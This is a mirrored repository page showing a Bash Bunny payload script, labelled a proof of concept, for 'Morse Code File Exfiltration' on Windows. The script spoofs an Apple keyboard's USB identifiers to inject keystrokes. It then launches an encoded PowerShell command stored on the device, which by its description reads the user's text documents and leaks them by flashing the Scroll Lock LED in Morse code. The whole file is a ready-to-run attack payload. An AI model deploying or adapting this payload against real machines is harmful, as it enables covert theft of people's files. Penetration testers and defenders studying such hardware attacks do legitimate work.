mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
23 lines
680 B
Plaintext
23 lines
680 B
Plaintext
# Title: Morse Code File Exfiltration
|
|
# Description: Reads all txt files in myDocs and Flashes the Scrolllock on and off to represent morse code
|
|
# Author: Cribbit
|
|
# Version: 1.2
|
|
# Category: PoC
|
|
# Target: Windows (Powershell 5.1+)
|
|
# Attackmodes: HID & STORAGE
|
|
# Extensions: Run
|
|
# Notes: Morse code only surports [0..9A..Z] so other char will be show as blanks
|
|
|
|
LED SETUP
|
|
|
|
GET SWITCH_POSITION
|
|
|
|
ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E
|
|
|
|
LED ATTACK
|
|
|
|
QUACK DELAY 200
|
|
RUN WIN "powershell .(powershell.exe -encodedCommand (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\b.txt')))"
|
|
|
|
LED FINISH
|